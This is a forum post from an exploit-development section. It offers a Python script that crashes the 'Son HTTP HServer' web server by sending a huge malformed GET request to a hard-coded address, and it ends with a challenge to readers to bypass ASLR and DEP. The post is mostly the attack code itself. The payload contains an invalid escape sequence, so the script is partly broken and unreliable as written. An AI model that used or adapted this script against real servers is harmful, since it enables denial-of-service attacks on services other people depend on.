Jump to content
sleed

Buffer Overflow Denial Of Service: Son HTTP HServer

By sleed, in Reverse engineering & exploit development

Recommended Posts

sleed Newbie

sleed

Posted
Posted (edited) 

# Exploit Title: Son HTTP HServer  stack buffer overflow
# Date: 2015 June
# Author: sleed - [URL="http://www.rstforums.com"]Romanian Security Team - Homepage[/URL] & Pwnthecode.org
# Version: 0.9
# Tested on: Windows 8
#
# Description: A simple bof denial of service in Son HTTP HServer
# 
#

import socket
import struct

payload =  "\x42\x41\x43" * 80392 
payload += "\x81\xc4\xf0\xea\xff\xff" + "B" * 70330
payload += "\x0r" + "C" * 110030

print "[+] sending payload: ", len(payload)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.100", 80))

buf = (
    "GET /" + payload + " HTTP/1.1\r\n" +
    "Host: 192.168.0.101" +
    "\r\n\r\n"
)

s.send(buf)
s.close()

full

Screenshot_9.png

//Cine are chef sa-si bata capul, sa TREACA DE ASLR si DEP e my guest :))

Screenshot_8.png

Edited by sleed
  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...